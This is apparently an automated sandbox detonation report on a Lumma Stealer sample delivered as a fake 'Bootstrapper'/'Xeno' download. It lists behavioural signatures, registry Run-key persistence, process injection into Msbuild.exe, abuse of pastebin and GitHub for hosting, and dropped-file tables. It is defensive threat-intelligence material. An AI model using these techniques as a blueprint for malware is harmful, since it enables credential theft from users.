Analysis Overview
SHA256
ea8fac7c65fb589b0d53560f5251f74f9e9b243478dcb6b3ea79b5e36449c8d9
Threat Level: Known bad
The file . was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer, LummaC
Lumma family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
Unexpected DNS network traffic destination
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Maps connected drives based on registry
Adds Run key to start application
Enumerates connected drives
Looks up external IP address via web service
Network Share Discovery
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks system information in the registry
Suspicious use of NtCreateThreadExHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Gathers network information
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
GoLang User-Agent
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Enumerates system info in registry
Modifies data under HKEY_USERS
System policy modification
Suspicious use of WriteProcessMemory
Detects videocard installed
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Modifies system certificate store
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-27 13:09
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-27 13:09
Reported
2024-10-27 13:30
Platform
win10ltsc2021-20241023-en
Max time kernel
1288s
Max time network
1289s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Bootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BootstrapperV1.22.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\TEMP\sdwra_2176_1806173670\service_update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
| Destination IP | 1.0.0.1 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YandexBrowserAutoLaunch_45886AE68CD319C7351FF54A1DBD4B87 = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --shutdown-if-not-closed-by-system-restart" | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe | N/A |
Network Share Discovery
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Yandex\ui | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 7336 set thread context of 9720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\index.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\content\write.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\debug\node_modules\ms\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\parse-proxy-response.js.map | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\PdfPreview\PdfPreviewHandler.dll | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\pl.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\gte.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\lib\commands\token.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\lib\common\owner-sync.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\binary-extensions\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\lib\path-arg.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\kn.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\lib\utils\error-message.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\lib\cache\policy.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\build.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-docs.html | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\src\table.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\notification_helper.exe | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\EBWebView\x86\EmbeddedBrowserWebView.dll | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\lib\utils\is-windows.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\typos.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\msedgeupdateres_ca-Es-VALENCIA.dll | C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\AdSelectionAttestationsPreloaded\manifest.json | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\negotiator\lib\charset.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\init-package-json\LICENSE.md | C:\Windows\system32\msiexec.exe | N/A |
